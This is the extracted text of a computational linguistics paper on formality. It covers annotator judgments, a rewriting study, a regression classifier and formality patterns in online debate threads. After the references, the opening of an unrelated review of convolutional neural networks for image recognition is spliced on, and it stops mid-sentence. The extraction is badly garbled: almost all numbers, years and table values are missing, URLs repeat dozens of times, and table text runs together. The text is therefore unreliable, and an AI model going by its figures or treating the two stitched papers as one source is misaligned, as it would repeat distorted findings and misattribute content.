neutral formality. this fits naturally into our treatment of formality as a continuous as opposed to a binary attribute. . factors affecting formality from the above analysis, we conclude that hu- mans have a reasonably coherent concept of for- mality. however, it is difficult to tease apart perceived formality differences that arise from the literal meaning of the text (e.g. whether the topic is serious or trivial) as opposed to arising from the style in which those ideas are expressed. to get a better understanding of the stylistic choices that differentiate formal from informal, we ran a second experiment in which we asked annotators to rewrite informal sentences in order to make them more formal. the goal is to isolate some of the linguistic factors that contribute to perceived formality while constraining the literal content of the text to be the same. we use this data for analysis in this section, as well as for evaluation in section . . for this task, we chose , sentences from the answers dataset, since it displays the widest variety of topics and styles. we attempt to https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf https://cran.r-project.org/web/packages/psych/psych.pdf capitalization % i do not like walmart. i do not like walmart. punctuation % she’s , but she seems more like a !!!!! she is , but she seems more like ! paraphrase % lexus cars are awesome! lexus brand cars are very nice. delete fillers % well it depends on that girl. it depends on the girl. completion % looks good on your record. it looks good on your record. add context % alive - i have seen that guy working at a - behnd the counter my opinion is that osama bin laden is alive as i have encountered him working at a - store . contractions % i really don’t like them. i really do not like them. spelling % i love dancing iwth my chick friends. i enjoy dancing with my girlfriends. normalization % juz try to put ur heart in to it. just try to put your heart into it. slang/idioms % that’s a big no. i do not agree. politeness % uh, more details? could you provide more details, please? split sentences % [. . . ] not as tough... like high school [. . . ] not as tough. it’s like high school. relativizers % sorry i ’ m not much help heh sorry that i am not much help. table : frequency of types of edits/changes made in rewriting experiment, and examples of each. note the categories are not mutually exclusive. choose sentences that are informal enough to permit formalizing, while covering all ranges of informality, from highly informal (“yep...love the pic lol”) to only slightly informal (“as long as you feel good.”). each sentence is shown in the context of the question and the full an- swer post in which it appeared. we collect one rewrite per sentence, and manually remove spammers. people make a large variety of edits, which cover the “noisy text” sense of formality (e.g. punctuation fixes, lexical normalization) as well as the more situational sense (e.g. inserting politeness, providing context). to character- ize these different edit types, we manually re- viewed a sample of rewrites and categorized the types of changes that were made. table gives the results of this analysis. over half of the rewrites involved changes to capitalization and punctuation. a quarter involved some sort of lexical or phrasal paraphrase (e.g “awesome” → “very nice”). in % of cases, the rewritten sen- tence incorporated additional information that was apparent from the larger context, but not present in the original sentence. this accords with heylighen and dewaele ( )’s definition of “deep” formality, which says that formal lan- guage strives to be less context-dependent. recognizing formality automatically in the above section, we asked whether humans can recognize formality and what contributes to their perception of formal or informal. we now ask: how well can computers automatically dis- tinguish formal from informal and which linguis- tic triggers are important for doing so? . setup we use the data described in section . for training, using the mean of the annotators’ scores as the gold standard labels. we train a ridge regression model with the model parame- ters tuned using cross validation on the training data. unless otherwise specified, we keep gen- res separate, so that models are trained only on data from the genre in which they are tested. features. we explore different feature groups, described in table . to the best of our knowledge, of these feature groups (ngrams, word embeddings, parse tree pro- ductions, dependency tuples, and named en- tities) have not been explored in prior work on formality recognition. the remaining fea- tures (e.g. length, pos tags, case, punctua- tion, formal/informal lexicons, and subjectiv- ity/emotiveness) largely subsume the features explored by previously published classifiers. we use stanford corenlp for all of our linguistic processing, except for subjectivity features, for which we use textblob. http://scikit-learn.org/ http://nlp.stanford.edu/software/corenlp https://textblob.readthedocs.org http://scikit-learn.org/ http://nlp.stanford.edu/software/corenlp https://textblob.readthedocs.org case number of entirely-capitalized words; binary indicator for whether sentence is lowercase; binary indi- cator for whether the first word is capitalized. *dependency one-hot features for the following dependency tuples, with lexical items backed off to pos tag: (gov, typ, dep), (gov, typ), (typ, dep), (gov, dep). *entity one-hot features for entity types (e.g. person, location) occurring in the sentence; average length, in characters, of person mentions. lexical number of contractions in the sentence, normalized by length; average word length; average word log-frequency according to google ngram corpus; average formality score as computed by pavlick and nenkova ( ). *ngram one-hot features for the unigrams, bigrams, and trigrams appearing in the sentence. *parse depth of constituency parse tree, normalized by sentence length; number of times each production rule appears in the sentence, normalized by sentence length, and not including productions with terminal symbols (i.e. lexical items). pos number of occurrences of each pos tag, normalized by the sentence length. punctuation number of ‘?’, ‘...’, and ‘!’ in the sentence. readability length of the sentence, in words and characters; flesch-kincaid grade level score. subjectivity number of passive constructions; number of hedge words, according to a word list; number of st person pronouns; number of rd person pronouns; subjectivity according to the textblob sentiment module; binary indicator for whether the sentiment is positive or negative, according to the textblob sentiment module. all of the counts are normalized by the sentence length. *word vec average of word vectors using pre-trained word vec embeddings, skipping oov words. table : summary of feature groups used in our model. to the best of our knowledge, those marked with (*) have not been previously studied in the context of detecting linguistic formality. baselines. we measure the performance of our model using spearman ρ with human labels. we compare against the following baselines: • sentence length: we measure length in characters, as this performed slightly better than length in words. • flesch-kincaid grade level: fk grade level (kincaid et al., ) is a function of word count and syllable count, designed to measure readability. we expect higher grade levels to correspond to more formal text. • f-score: heylighen and dewaele ( )’s formality score (f-score) is a function of pos tag frequency which is designed to measure formality at the document- and genre-level. we expect higher f-score to correspond to more formal text. • lm perplexity: we report the perplex- ity according to a -gram language model trained on the english gigaword with a vo- cabulary of k words. we hypothesize that sentences with lower perplexity (i.e. sentences which look more similar to edited news text) will tend to be more formal. we also explored using the ratio of the per- plexity according to an “informal” language model over the perplexity according to a “formal” language model as a baseline, but the results of this baseline were not compet- itive, and so, for brevity, we do not include them here. • formality lexicons: we compare against the average word formality score according to the formality lexicon released by brooke and hirst ( ). we compute this score in the same way as sidhaye and cheung ( ), who used it to measure the formal- ity of tweets. • ngram classifier: as our final baseline, we train a ridge regression model which uses only ngrams (unigrams, bigrams, and tri- grams) as features. comparison against previously published models. note that we are not able to make a meaningful comparison against against any of the previously published statistical models for formality detection. to our knowledge, there are three relevant previous publications that pro- duced statistical models for detecting formality: abu sheikha and inkpen ( ), peterson et al. ( ), and mosquera and moreda ( b). all three of these models performed a binary clas- sification (as opposed to regression) and oper- ated at the document (as opposed to sentence level). we were able to closely reimplement the model of peterson et al. ( ), but we choose not to include the results here since their model was designed for binary email-level classification and thus relies on domain-specific features (e.g. casing in the subject line), that are not available in our real-valued, sentence-level datasets. the other models and the data/lexicons on which they relied are not readily available. for this reason, we do not compare directly against the previously published statistical models, but ac- knowledge that several of our features overlap with prior work (see section . and table ). . performance table reports our results on -fold cross val- idation. using our full suite of features, we are able to achieve significant performance gains in all genres, improving by as much as points over our strongest baseline (the ngram model). answers blogs email news lm ppl . - . . - . f-score . . . . length . . . . f-k level . . . . b&h lexicon . . . . ngram model . . . . classifier . . . . table : spearman ρ with human judgments for our model and several baselines. note that, while the basic lm perplexity cor- relates very weakly with formality overall, the email genre actually exhibits a trend opposite of that which we expected: in email, sentences which look less like gigaword text (higher per- plexity) tend to be more formal. on inspec- tion, we see that many of the sentences which have low perplexity but which humans label as informal include sentences containing names and greeting/signature lines, as well as sentences which are entirely capitalized (capitalization is not considered by the lm). contributions of feature groups. in order to gain better insight into how formality differs across genres, we look more closely at the perfor- mance of each feature group in isolation. table shows the performance of each feature group relative to the performance of the full classifier, for each genre. a few interesting results stand out. ngram and word embedding features per- form well across the board, achieving over % of the performance of the full classifier in all cases. casing and punctuation features are sig- nificantly more important in the answers do- main than in the other domains. constituency parse features and entity features carry notably more signal in the blog and news domains than in the email and answers domains. answers blogs email news ngram . . . . word vec . . . . parse . . . . readability . . . . dependency . . . . lexical . . . . case . . . . pos . . . . punctuation . . . . subjectivity . . . . entity . . . . table : relative performance of each feature group across genres. numbers reflect the perfor- mance (spearman ρ) of the classifier when using only the specified feature group, relative to the performance when using all feature groups. train\test answers blogs email news answers - - - blogs - - - email - - - news - - - table : drop in performance (spearman ρ × ) when model is trained on sentences from one domain (row) and tested on sentences from another (column). changes are relative to the performance when trained only on sentences from the test domain (represented by zeros along the diagonal). all models were trained on an equal amount of data. observing these differences between data sets raises the question: how well does knowledge of formality transfer across domains? to answer this, we measure classifier performance when trained in one domain and tested in another (table ). in our experiments, the model trained all models were trained on an equal amount of data. on answers consistently provided the best per- formance out of domain, resulting in perfor- mance degradations of roughly points (spear- man ρ) compared to models trained on target domain data. training on news and testing on answers caused the largest drop ( points com- pared to training on answers). pairwise classification. as a final evalua- tion, we use the , rewritten sentences from section . as a held-out test set. this allows us to test that our classifier is learning real style differences, not just topic differences. we as- sume that workers’ rewrites indeed resulted in more formal sentences, and we frame the task as a pairwise classification in which the goal is to determine which of the two sentences (the original or the rewrite) is more formal. a ran- dom baseline achieves % accuracy. if we use the f-k readability measure, and assume the sentence with the higher grade level is the more formal of the two, we achieve only % accuracy. by running our supervised regression model and choosing the sentence with the higher predicted formality score as the more formal sentence, we achieve % accuracy, providing evidence that the model picks up subtle stylistic, not just topic, differences. formality in online discussions so far we have focused on building a model that can automatically distinguish between formal and informal sentences. we now use that model to analyze formality in practice, in the context of online discussion forums. we look to exist- ing theories of formality and of linguistic style matching to guide our analysis. in particular: • formality is higher when the amount of shared context between speakers is low (heylighen and dewaele, ). • formality is higher when speakers dislike one another (fielding and fraser, ). • speakers adapt their language in order to match the linguistic style of those with whom they are interacting (danescu- niculescu-mizil et al., ). ladywolf i was checking out this website for exodus international and i understand their mission is to provide an alternative for people who choose to be heterosexual. [...] i just find it hard to believe that they don’t somehow manipulate the situation in a less than fair way. joebrummer i started a thread earlier about just this! these groups are dangerous ladywolf, there is so much evidence to support that [...] ladywolf i thought so [...] i also see that they are running major newspaper ads...hmmm, how unbiased can a newspaper ad like this be? [...] i’m so glad i wasn’t raised a christian because from the tone of some of the replies, some members of this cult can be pretty mean huh? joebrummer yes, the are mean funny enough in the name of god. i was raised christian, catholic no less. i studied the bible, i was raised believing i would go to hell. that was tough. ladywolf i bet that was tough [...] i was raised jewish [...] it’s like so wierd because i’ve never had to deal with these types of people before. figure : example of a thread from our data. [...] indicates text has been left out to save space. with these hypotheses in mind, we explore how formality changes across topics and users (§ . ), how it relates to other pragmatic dimensions (§ . ), and how it changes over the lifetime of a thread (§ . ). understanding these patterns is an important first step toward building systems that can interact with people in a pragmatically competent way. . discussion data our data comes from the internet argument corpus (iac) dataset (walker et al., ), a corpus of threaded discussions from online de- bate forums. the dataset consists of k posts covering different topics, from economics to entertainment. we focus on threads in our anal- ysis, defined as chains of posts in which each is an explicit reply to the previous post (figure ). when the same user makes multiple consecutive posts in a thread (i.e. replies to their own post), we collapse these and treat them as a single post. in total, our data covers , threads. automatic classification. first, we assign a formality score to each post in our data us- ing the answers model in section . since this model is designed for sentence-level prediction, we define the score of a post to be the mean score of the sentences in that post. we acknowl- edge that this approximation is not ideal; to con- firm that it will be sufficient for our analyses, we collect human judgments for , random posts using the same task setup as we used for the sentence-level judgments in section . . the correlation of our predicted score with the mean human score is . , which is within the range of inter-annotator agreement for labeling post formality ( . ≤ ρ ≤ . ). we take this as confirmation that the mean predicted sentence score is a decent approximation of human for- mality judgments for our purposes. figure : formality distribution of posts in most popular topics in discussion data. the most popular topics (*) are used in our other analyses. . how do topic and user affect formality? as formality is intertwined with many content- specific style dimensions such as “serious- trivial” (irvine, ), we expect the overall for- mality level to differ across topics. figure confirms this– many topics are clearly skewed toward being formal (e.g. economics) while others are skewed toward informal (e.g. fun). however, every topic includes both formal and informal posts: there are informal posts in eco- nomics (“oh my! a poor person....how could this have happened!”) and formal posts in fun (“difficult to consider either one, or their vari- this range matches the agreement range observed for post-level politeness annotations (danescu-niculescu- mizil et al., ). note agreement is more varied at the post level than at the sentence level. this makes sense given the “mixed formality” phenomenon: i.e. for long posts, a range of formality can be expressed, making the choice of a single score more subjective. the range of post formalities is generally narrower than was the range of sentence formalities. while sentence-level scores range between - and , we find that % of post scores fall between - and . ations, as a viable beverage when beer is avail- able.”). we see a similar pattern when we look at post formality levels by user: while most people speak generally formally or generally informally ( % of users have a mean formality level that is significantly different from at p < . ), nearly every user ( %) produces both formal and in- formal posts. this is true even when we look at users within one topic. these results are in- teresting: they suggest that while the formality of a post is related to the topic of discussion and to the individual speaker, these alone do not explain formality entirely. rather, as the aforementioned theories suggest, the same per- son discussing the same topic may become more or less formal in response to pragmatic factors. . how does formality relate to other pragmatic styles? formality is often considered to be highly re- lated with, and even to subsume, several other stylistic dimensions including politeness, impar- tiality, and intimacy. heylighen and dewaele ( ) suggest that formality is higher when shared social context is lower, and thus lan- guage should be more formal when directed at larger audiences or speaking about abstract con- cepts. fielding and fraser ( ) further sug- gest that informality is an important way of ex- pressing closeness with someone, and thus for- mality should be higher when speakers dislike one another. to investigate these ideas further, we look at how formality correlates with human judgments of several other pragmatic dimensions. we use the manual style annotations that are released for a subset of post-reply pairs ( k total) in the iac dataset (walker et al., ). these anno- tations include, for example, the extent to which the reply agrees/disagrees with the post and the extent to which the reply is insulting/respectful of the post. each of these dimensions has been rated by human annotators on a likert scale, similar to our own formality annotations. addi- tionally, to investigate how formality correlates we consider posts with scores > . as “formal” and those with scores < − . as “informal.” emotional the main cause of so much hate and disrespect is the phony war we’re fighting and our tactics in violation of international law, our attitude of superiority in the world, and our bullying of others. impolite as a former administrator, and therefore a veteran editor who knows how wikipedia really works, i am actually surprised you would even ask such a question with such an obvious answer. insulting and here ladies and gentlemen we have the evidence of why i am justified in calling the likes of ‘stormboy’ an idiot. sarcastic thank you for bringing to my attention that atoms, neutrons and protons are merely scientific assumptions. now as i gaze at the night sky with all its bits and pieces spinning around each other i can sleep happily knowing that our solar system is not part of a housebrick afterall. table : formal posts exhibiting style properties often thought not to co-occur with formality. with politeness, we use the the stanford po- liteness corpus (danescu-niculescu-mizil et al., ), which consists of k short posts from wikipedia discussion forums which again have been manually annotated on an ordinal scale. our results are generally consistent with what theories suggest. we find that posts which are targeted toward more general audiences (as op- posed to specific people) and which make fact- based (as opposed to emotion-based) arguments are generally more formal (ρ = . and . , respectively), and that formality is significantly positively correlated with politeness (ρ = . ). we find significant negative correlations be- tween formality and the extent to which the post is seen as sarcastic (ρ = − . ) or insulting (ρ = − . ). interestingly, we do not find a sig- nificant correlation between formality and the degree of expressed agreement/disagreement. while the directions of these relationships match prior theories and our intuitions, the strength of the correlation in many cases is weaker than we expected to see. table pro- vides examples of some of the less intuitive co- occurences of style, e.g. impolite but formal posts. these examples illustrate the complex- ity of the notion of formality, and how formal language can be used to give the impression of social distance while still allowing the speaker’s emotions and personality to be very apparent. . how does formality change throughout a discussion? prior work has revealed that speakers often adapt their language to match the language of those with whom they are interacting (danescu- niculescu-mizil et al., ). we therefore inves- tigate how formality changes over the lifetime of a thread. do discussions become more or less formal over time? do speakers’ levels of formal- ity interact with one another? for these analyses, we focus on threads from to posts in length. because threads can branch, multiple threads might share a prefix sequence of posts. to avoid double counting, we group together threads which stem from the same post and randomly chose one thread from each such group, throwing away the rest. following the theory that formality is deter- mined by the level of shared context, heylighen and dewaele ( ) hypothesize that formality should be highest at the beginning of a conversa- tion, when no context has been established. we observe that, in fact, the first posts have signif- icantly higher formality levels on average than do the remaining posts in the thread (figure ). once a context is established and a discus- sion begins, the theory of linguistic style match- ing suggests that people change their language to match that of others in the conversation (niederhoffer and pennebaker, ; danescu- niculescu-mizil et al., ). is this phe- nomenon true of formality? does a person’s level of formality reflect the formality of those with whom they are speaking? figure shows an example thread in which the speakers together move toward more infor- mal tone as the conversation becomes more per- sonal. to see if this kind of formality matching is the case in general, we use a linear mixed ef- fects model. briefly, a mixed effects model is we use the mixed effects model with random intercepts provided by the statsmodels python package: http://statsmodels.sourceforge.net/devel/mixed_ http://statsmodels.sourceforge.net/devel/mixed_linear.html initial i wish to have a formal debate in the debate tournaments section on global warming. i propose the subject title of ”global warming is both occuring and has been shown to be at least in part caused by human activity” i will take the afirmative position. anyone want to argue the opposite? reply global warming is a controversy. personally i am like hundred of maybe thousands if not millions of people that think it is liberal ###. the hole in the ozone layer is false, and i am sure this is too. initial the us military says that saddam hussein’s briefcase contained transcripts of meetings with terrorists, contact information for those terrorists, and information on financial transactions that he carried out. [...] i wonder what else was in the briefcase. [...] reply transcripts? strange. i would be curious too. figure : on average, first posts are significantly more formal than later posts. left: mean formality of posts by position in thread. right: some examples where formal initial posts are followed by less formal replies. (note: forums.com replaces expletives with #s.) a regression analysis that allows us to measure the influence of various “fixed effects” (e.g. the formality of the prior post) on a post’s formality, while controlling for the “random effects” which prevent us from treating every post as an inde- pendent observation. in our case, we treat the topic and the author as random effects, i.e. we acknowledge that the formality levels of posts in the same topic by the same author are not inde- pendent, and we want to control for this when measuring the effects of other variables. we include fixed effects in our model of a post’s formality: the formality of the previous post, the number of prior posts in the thread (position), the number of prior posts by this au- thor in the thread (veteran level), the length of the entire thread, the total number of partici- pants in the entire thread, and the lengths of the current and prior posts. we also include the pairwise interactions between these fixed effects. we include the topic and author as a random ef- fect. for these analyses, we omit the first post in every thread, as prior analysis suggests that the function of the first post, and its formality, is markedly different from that of later posts. table gives the most significant results from our regression. we observe several inter- esting significant effects, such as a negative re- lationship between the number of times an au- thor has posted in the thread and their formal- ity level: i.e. people are more informal the more they post. however, the single best predictor of the formality of a post is the formality of the post to which it is replying. the estimated ef- linear.html. coefficient previous score . veteran level − . thread length . number of participants − . previous score × position . position . table : estimated coefficients of variables strongly related to the formality of a post, con- trolling for topic- and author-specific random ef- fects. all effects are significant at p < . . × signifies an interaction between variables. fect size is . , meaning, all else being equal, we expect an increase of in the prior post’s formality to correspond to an increase of . in the formality of the current post. this sug- gests that a person’s formality does depend on the formality of others in the conversation. perhaps more interestingly, we see a signifi- cant positive effect of the interaction between previous score and position. that is, the effect of prior post formality on current post formality becomes stronger later in a thread compared to at the beginning of a thread. figure shows how the estimated coefficient for prior post formality on current post formality changes when we look only at posts at a particular index in a thread (e.g. only second posts, only tenth posts). we can see that the coefficient is more than twice as large for the tenth post of a thread than it is for the second post in that thread. one could imag- ine several explanations for this: i.e. users with similar formality levels may engage in longer dis- cussions, or users who engage in longer discus- http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html http://statsmodels.sourceforge.net/devel/mixed_linear.html position of post in thread . . . . . . . . e st im a te d c o e ff ic ie n t fo r p ri o r p o st 's f o rm a li ty figure : effect size of prior posts’s formality on current post’s formality for posts at different positions in a thread. effect size can be inter- preted as the expected increase in a post’s for- mality corresponding to an increase of in the prior post’s formality, all else being equal. sions may tend to adapt better to one another as the discussion progresses. we leave further investigation for future work. conclusion language contains more than its literal content: stylistic variation accounts for a large part of the meaning that is communicated. formality is one of the most basic dimensions of stylistic varia- tion in language, and the ability to recognize and respond to differences in formality is a necessary part of full language understanding. this paper has provided an analysis of formality in written communication. we presented a study of human perceptions of formality across multiple genres, and used our findings to build a statistical model which approximates human perceptions of for- mality with high accuracy. this model enabled us to investigate trends in formality in online de- bate forums, revealing new evidence in support of existing theories about formality and about linguistic coordination. these findings provide important steps toward building pragmatically competent automated systems. acknowledgements. we would like to thank martin chodorow for valuable discussion and in- put, and marilyn walker, shereen oraby, and shibamouli lahiri for sharing and facilitating the use of their resources. we would also like to thank amanda stent, dragomir radev, chris callison-burch, and the anonymous reviewers for their thoughtful suggestions. references fadi abu sheikha and diana inkpen. . auto- matic classification of documents by formality. in interntional conference on natural language pro- cessing and knowledge engineering (nlp-ke), pages – . ieee. fadi abu sheikha and diana inkpen. . gen- eration of formal and informal sentences. in pro- ceedings of the th european workshop on natu- ral language generation, pages – , nancy, france, september. association for computa- tional linguistics. cristina battaglino and timothy bickmore. . increasing the engagement of conversational agents through co-constructed storytelling. eighth workshop on intelligent narrative technologies. julian brooke and graeme hirst. . supervised ranking of co-occurrence profiles for acquisition of continuous lexical attributes. in proceedings of the th international conference on computa- tional linguistics. julian brooke, tong wang, and graeme hirst. . automatic acquisition of lexical formality. in col- ing : posters, pages – , beijing, china, august. coling organizing committee. penelope brown and colin fraser. . speech as a marker of situation. in social markers in speech, pages – . cambridge university press. ido dagan, oren glickman, and bernardo magnini. . the pascal recognising textual entail- ment challenge. in machine learning challenges. evaluating predictive uncertainty, visual object classification, and recognising textual entail- ment, pages – . springer. cristian danescu-niculescu-mizil, michael gamon, and susan dumais. . mark my words!: lin- guistic style accommodation in social media. in proceedings of the th international conference on world wide web, pages – . acm. cristian danescu-niculescu-mizil, lillian lee, bo pang, and jon kleinberg. . echoes of power: language effects and power differences in social interaction. in proceedings of the st international conference on world wide web, pages – . acm. cristian danescu-niculescu-mizil, moritz sudhof, dan jurafsky, jure leskovec, and christopher potts. . a computational approach to polite- ness with application to social factors. proceedings of the st annual meeting of the association for computational linguistics (volume : long pa- pers), pages – , august. birgit endrass, matthias rehm, and elisabeth andré. . planning small talk behavior with cultural influences for multiagent systems. com- puter speech & language, ( ): – . alex chengyu fang and jing cao. . adjec- tive density as a text formality characteristic for automatic text classification: a study based on the british national corpus. in proceedings of the rd pacific asia conference on language, infor- mation and computation, pages – , hong kong, december. city university of hong kong. rachele de felice and paul deane. . identifying speech acts in e-mails: toward automated scoring of the toeic r© e-mail task. ets research report series, ( ):i– . guy fielding and colin fraser. . language and interpersonal relations. the social context of lan- guage, pages – . francis heylighen and jean-marc dewaele. . formality of language: definition, measurement and behavioral determinants. interner bericht, center “leo apostel”, vrije universiteit brüssel. eduard hovy. . generating natural language under pragmatic constraints. journal of pragmat- ics, ( ): – . judith t. irvine. . formality and informality in communicative events. american anthropologist, ( ): – . w. lewis johnson, richard e. mayer, elisabeth andré, and matthias rehm. . cross-cultural evaluation of politeness in tactics for pedagogical agents. in aied, volume , pages – . raquel justo, thomas corcoran, stephanie m. lukin, marilyn walker, and m. inés torres. . extracting relevant knowledge for the de- tection of sarcasm and nastiness in the social web. knowledge-based systems, : – . foaad khosmood and marilyn walker. . grapevine: a gossip generation system. in pro- ceedings of the fifth international conference on the foundations of digital games, pages – . acm. j. peter kincaid, robert p. fishburne jr., richard l. rogers, and brad s. chissom. . derivation of new readability formulas (automated readabil- ity index, fog count and flesch reading ease for- mula) for navy enlisted personnel. technical re- port, dtic document. vinodh krishnan and jacob eisenstein. . you’re mr. lebowski, i’m the dude: inducing address term formality in signed social networks. proceedings of the conference of the north american chapter of the association for compu- tational linguistics: human language technolo- gies, pages – , may–june. shibamouli lahiri, prasenjit mitra, and xiaofei lu. . informality judgment at sentence level and experiments with formality score. in computa- tional linguistics and intelligent text processing, pages – . springer. shibamouli lahiri. . squinky! a corpus of sentence-level formality, informativeness, and im- plicature. arxiv preprint arxiv: . . haiying li, zhiqiang cai, and arthur c. graesser. . comparing two measures for formality. in the twenty-sixth international flairs confer- ence. françois mairesse and marilyn a. walker. . controlling user perceptions of linguistic style: trainable generation of personality traits. com- putational linguistics, ( ): – . françois mairesse. . learning to adapt in dia- logue systems: data-driven models for personality recognition and generation. ph.d. thesis, univer- sity of sheffield, united kingdom. alejandro mosquera and paloma moreda. a. a qualitative analysis of informality levels in web . texts: the facebook case study. in proceedings of the lrec workshop:@ nlp can u tag #user generated content, pages – . alejandro mosquera and paloma moreda. b. smile: an informality classification tool for help- ing to assess quality and credibility in web . texts. in proceedings of the icwsm workshop: real-time analysis and mining of social streams (ramss). kate g. niederhoffer and james w. pennebaker. . linguistic style matching in social interac- tion. journal of language and social psychology, ( ): – . ellie pavlick and ani nenkova. . inducing lex- ical style properties for paraphrase and genre dif- ferentiation. in proceedings of the confer- ence of the north american chapter of the associ- ation for computational linguistics: human lan- guage technologies, pages – , denver, col- orado, may–june. association for computational linguistics. kelly peterson, matt hohensee, and fei xia. . email formality in the workplace: a case study on the enron corpus. in proceedings of the work- shop on language in social media (lsm ), pages – , portland, oregon, june. association for computational linguistics. nils reiter and anette frank. . identifying generic noun phrases. in proceedings of the th annual meeting of the association for computa- tional linguistics, pages – , uppsala, sweden, july. association for computational linguistics. priya sidhaye and jackie chi kit cheung. . in- dicative tweet generation: an extractive summa- rization problem? proceedings of the conference on empirical methods in natural language pro- cessing. robert j. sigley. . text categories and where you can stick them: a crude formality in- dex. international journal of corpus linguistics, ( ): – . sangweon suh, harry halpin, and ewan klein. . extracting common sense knowledge from wikipedia. in proceedings of the workshop on web content mining with human language tech- nologies at iswc, volume . marilyn a. walker, jean e. fox tree, pranav anand, rob abbott, and joseph king. . a corpus for research on deliberation and debate. the inter- national conference on language resources and evaluation, pages – . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research on the application of convolutional neural networks in the image recognition gu hongxian . school of computer science and engineering xi'an technological university xi’an, , china . state and provincial joint engineering lab of advanced network, monitoring and control xi’an, , china e-mail: @ .com liu bailin . school of computer science and engineering xi'an technological university xi’an, , china . state and provincial joint engineering lab of advanced network, monitoring and control xi’an, , china e-mail: @qq.com gao zhiyu school of computer science and engineering xi'an technological university xi’an, , china e-mail: @qq.com mu jing school of computer science and engineering xi'an technological university xi’an, , china e-mail: @qq.com abstract—over the past few years, benefits from the strong feature extraction advantages of convolutional neural networks (cnn)themselves and the efforts and applicationby researchers making, research work on cnn in the field of image recognition has yielded many results and achieved the best performance in classification and regression tasks. this paper focuses on the improvement and application history ofcnnand summarizes the direction of improvement and optimization of cnn in recent years from the perspective of the structure of cnn themselves and their applications in various fields. finally, this review is summarized with a further outlook on the development direction of cnn. keywords-image recognition; deep learning; machine learning; convolutional neural networks i. introduction since the concept of deep learning was proposed by hinton et al[ ]. in , during more than a decade of development, machine learning is closer to the original goal of "artificial intelligence". deep learning is a hierarchical machine learning approach that involves multiple levels of nonlinear transformations that learn the inherent laws and representation levels of sample data, and the feature information obtained in the process of learning can help the machine achieve analytical judgments about the data. compared to traditional machine learning methods, it has achieved good results in search technology, image recognition, machine translation, natural mailto: @ .com mailto: @qq.com mailto: @qq.com international journal of advanced network, monitoring and controls volume , no. , language processing, multimedia learning, speech, recommendation and personalization technologies. with the practice of researchers in various fields, many network models have been proposed, such as dbn (deep belief network), cnn (convolutional neural network), rnn (recursive neural network), etc. the introduction of cnn into the field of image recognition has taken researchers a long time to explore and practice. image recognition technology originated in the s, when it was not rapidly developed due to inadequate technology and inadequate hardware facilities. it was not until the s that artificial neural networks combined with support vector machines(svm) facilitated the development of image recognition technology, which was widely used. however, traditional image recognition techniques are based on shallow structural models, which require human pre-processing of the image, resulting in reduced accuracy of image recognition. as computer hardware levels and gpu evolved, researchers began to work on deeper models of network structure, and in , krizhevsky et al. reduced the error rate of the tested top- to . % in imagenet's large-scale visual recognition challenge competition based on cnn, . % lower than the error rate of the second-place team's top- , showing the great potential of deep models. in the following years, cnn have made leaps and bounds in digital image recognition and processing with their powerful feature extraction capabilities. ii. overview of cnn cnn, compared to other network models, are better able to adapt their structures to image structures while extracting features and classifying them, with outstanding performance in image processing. in addition, its weight sharing feature educes the training parameters of the network, which makes the network structure simple and more generalizable, and has become a current research hotspot. a development history the prototype of the cnn is the 